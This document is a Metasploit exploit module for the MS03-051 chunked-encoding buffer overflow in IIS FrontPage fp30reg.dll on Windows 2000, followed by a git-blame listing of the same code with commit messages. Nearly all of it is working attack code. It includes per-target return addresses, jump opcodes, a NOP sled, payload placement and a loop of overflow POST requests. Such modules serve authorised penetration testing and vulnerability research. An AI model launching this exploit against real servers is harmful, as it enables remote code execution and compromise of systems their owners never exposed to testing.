modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow',
      'Description'    => %q{
          This is an exploit for the chunked encoding buffer overflow
        described in MS03-051 and originally reported by Brett
        Moore. This particular modules works against versions of
        Windows 2000 between SP0 and SP3. Service Pack 4 fixes the
        issue.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0822'],
          [ 'OSVDB', '2952'],
          [ 'BID', '9007'],
          [ 'MSB', 'MS03-051'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 SP0-SP3',  { 'Ret' => 0x6c38a4d0  }],   # from mfc42.dll
          ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1  }],   # from fp30reg.dll 07/22/2002
          ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d  }],   # from fp30reg.dll 10/06/1999
        ],
      'DisclosureDate' => '2003-11-11',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('URL', [ true,  "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),
      ])
  end

  def exploit

    print_status("Creating overflow request for fp30reg.dll...")

    pat = rand_text_alphanumeric(0xdead)
    pat[128, 4] = [target.ret].pack('V')
    pat[264, 4] = [target.ret].pack('V')

    # sub eax,0xfffffeff; jmp eax
    pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0"

    pat[280, 512] = make_nops(512)
    pat[792, payload.encoded.length] = payload.encoded

    0.upto(15) do |i|

      if (i % 3 == 0)
        print_status("Refreshing the remote dllhost.exe process...")

        res = send_request_raw({
          'uri' => normalize_uri(datastore['URL'])
        }, -1)

        if (res and res.body =~ /specified module could not be found/)
          print_status("The server states that #{datastore['URL']} does not exist.\n")
          return
        end
      end

      print_status("Trying to exploit fp30reg.dll (request #{i} of 15)")

      res = send_request_raw({
        'uri'     => normalize_uri(datastore['URL']),
        'method'  => 'POST',
        'headers' =>
        {
          'Transfer-Encoding' => 'Chunked'
        },
        'data'    => "DEAD\r\n#{pat}\r\n0\r\n"
      }, 5)

      if (res and res.body =~ /specified module could not be found/)
        print_status("The server states that #{datastore['URL']} does not exist.\n")
        return
      end

      handler

      select(nil,nil,nil,1)
    end
  end

  def check
    print_status("Requesting the vulnerable ISAPI path...")
    r = send_request_raw({
      'uri' => normalize_uri(datastore['URL'])
    }, -1)

    if (r and r.code == 501)
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Microsoft module name changes 2014-03-28 20:56:53 -05:00			`'Name' => 'MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This is an exploit for the chunked encoding buffer overflow`
New modules, module renames 2005-12-26 14:34:22 +00:00			`described in MS03-051 and originally reported by Brett`
			`Moore. This particular modules works against versions of`
			`Windows 2000 between SP0 and SP3. Service Pack 4 fixes the`
			`issue.`
			`},`
			`'Author' => [ 'hdm' ],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'References' =>`
			`[`
more adjusting of the cve entries. 2009-10-14 12:56:13 +00:00			`[ 'CVE', '2003-0822'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '2952'],`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`[ 'BID', '9007'],`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[ 'MSB', 'MS03-051'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",`
StackAdjustment added to most exploits, PNP tweaked 2006-07-31 02:01:14 +00:00			`'StackAdjustment' => -3500,`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
New modules, module renames 2005-12-26 14:34:22 +00:00			`[`
			`['Windows 2000 SP0-SP3', { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll`
			`['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999`
New modules, module renames 2005-12-26 14:34:22 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2003-11-11',`
New modules, module renames 2005-12-26 14:34:22 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def exploit`
Retab modules 2013-08-30 16:28:54 -05:00
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`print_status("Creating overflow request for fp30reg.dll...")`
Retab modules 2013-08-30 16:28:54 -05:00
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`pat = rand_text_alphanumeric(0xdead)`
New modules, module renames 2005-12-26 14:34:22 +00:00			`pat[128, 4] = [target.ret].pack('V')`
			`pat[264, 4] = [target.ret].pack('V')`
Retab modules 2013-08-30 16:28:54 -05:00
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`# sub eax,0xfffffeff; jmp eax`
New modules, module renames 2005-12-26 14:34:22 +00:00			`pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0"`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`pat[280, 512] = make_nops(512)`
			`pat[792, payload.encoded.length] = payload.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`0.upto(15) do \|i\|`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (i % 3 == 0)`
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`print_status("Refreshing the remote dllhost.exe process...")`
Retab modules 2013-08-30 16:28:54 -05:00
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`res = send_request_raw({`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`'uri' => normalize_uri(datastore['URL'])`
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`}, -1)`
Retab modules 2013-08-30 16:28:54 -05:00
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`if (res and res.body =~ /specified module could not be found/)`
			`print_status("The server states that #{datastore['URL']} does not exist.\n")`
			`return`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`end`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Remove "#{xxx.to_s}" redundancies ('s/\(#{[^}]*\)\.to_s}/\1}/g') 2008-12-19 07:11:08 +00:00			`print_status("Trying to exploit fp30reg.dll (request #{i} of 15)")`
Retab modules 2013-08-30 16:28:54 -05:00
Woops, forgot to remove some debugging information 2007-02-27 09:32:19 +00:00			`res = send_request_raw({`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`'uri' => normalize_uri(datastore['URL']),`
Woops, forgot to remove some debugging information 2007-02-27 09:32:19 +00:00			`'method' => 'POST',`
			`'headers' =>`
			`{`
			`'Transfer-Encoding' => 'Chunked'`
			`},`
			`'data' => "DEAD\r\n#{pat}\r\n0\r\n"`
			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Woops, forgot to remove some debugging information 2007-02-27 09:32:19 +00:00			`if (res and res.body =~ /specified module could not be found/)`
			`print_status("The server states that #{datastore['URL']} does not exist.\n")`
			`return`
This should fix #39 , the exploit will detect when the DLL is not installed 2007-02-27 09:31:54 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`handler`
Retab modules 2013-08-30 16:28:54 -05:00
Fixes #2134 . Subs select for sleep in exploit modules. 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,1)`
New modules, module renames 2005-12-26 14:34:22 +00:00			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`def check`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`print_status("Requesting the vulnerable ISAPI path...")`
			`r = send_request_raw({`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`'uri' => normalize_uri(datastore['URL'])`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`}, -1)`
Retab modules 2013-08-30 16:28:54 -05:00
New modules, module renames 2005-12-26 14:34:22 +00:00			`if (r and r.code == 501)`
			`return Exploit::CheckCode::Detected`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`